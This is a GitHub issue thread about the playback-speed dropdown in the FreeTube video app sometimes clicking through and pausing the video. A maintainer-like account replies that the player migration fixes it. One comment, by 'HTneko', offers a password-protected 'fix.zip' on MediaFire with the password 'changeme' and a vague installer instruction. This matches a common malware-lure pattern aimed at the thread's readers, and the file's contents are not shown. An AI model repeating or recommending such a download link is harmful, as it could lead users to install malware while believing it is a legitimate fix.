### ISSUE TITLE
[Bug]: Trying to adjust the playback speed via it's dropdown menu sometimes doesn't work and just clicks through

### ISSUE THREAD

**Issue by Victor239** [FreeTubeApp/FreeTube#5620]
### Guidelines

- [X] I have encountered this bug in the [latest release of FreeTube](https://github.com/FreeTubeApp/FreeTube/releases).
- [X] I have encountered this bug in the [official downloads of FreeTube](https://github.com/FreeTubeApp/FreeTube#official-downloads).
- [X] I have searched the issue tracker for [open](https://github.com/FreeTubeApp/FreeTube/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/FreeTubeApp/FreeTube/issues?q=is%3Aissue+is%3Aclosed) issues that are similar to the bug report I want to file, without success.
- [X] I have searched the [documentation](https://docs.freetubeapp.io/) for information that matches the description of the bug I want to file, without success.
- [X] This issue contains only one bug.

### Describe the bug

Trying to adjust the playback speed via the dropdown menu sometimes just doesn't work, and instead it clicks through the menu and instead pauses/resumes the video playback https://streamable.com/jqgo97

### Expected Behavior

The playback speed dropdown menu should work reliably.

### Issue Labels

feature stopped working, usability issue

### FreeTube Version

v0.21.3

### Operating System Version

Kubuntu 24.04

### Installation Method

Flathub

### Primary API used

Local API

### Additional Information

I've encountered this bug across multiple versions, just haven't created a bug report until now. 

### Nightly Build

- [ ] I have encountered this bug in the latest [nightly build](https://docs.freetubeapp.io/development/nightly-builds).

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by efb4f5ff-1298-471a-8973-3d47447115dc** [comment]
fixed by the player migration, will be available in the next minor version
